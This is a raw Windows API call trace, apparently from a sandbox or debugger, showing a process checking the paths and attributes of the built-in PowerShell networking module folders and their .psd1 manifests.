	[0058.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40
	[0058.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41
	[0058.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.878] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20
	[0058.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48
	[0058.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49
	[0058.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48
	[0058.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49
	[0058.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48
	[0058.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.879] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48
	[0058.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49
	[0058.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.880] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1")) returned 0x20
	[0058.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a
	[0058.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b
	[0058.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a
	[0058.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b
	[0058.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a
	[0058.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a
	[0058.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b
	[0058.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.881] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20
	[0058.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39
	[0058.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a
	[0058.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39
	[0058.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a
	[0058.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39
	[0058.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.882] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39
	[0058.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a
	[0058.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.882] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1")) returned 0x20
	[0058.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39
	[0058.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\", lpFilePart=0x0) returned 0x3a
	[0058.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39
	[0058.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\", lpFilePart=0x0) returned 0x3a
	[0058.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39
	[0058.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39
	[0058.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\", lpFilePart=0x0) returned 0x3a
	[0058.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.884] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1")) returned 0x20
	[0058.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e
	[0058.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f
	[0058.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e
	[0058.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f
	[0058.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0058.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e
	[0058.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f
	[0058.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.886] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1")) returned 0x20
	[0058.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40
	[0058.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41
	[0058.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40
	[0058.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40
	[0058.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.887] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40
	[0058.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.887] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1")) returned 0x20
	[0058.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b
	[0058.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c
	[0058.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
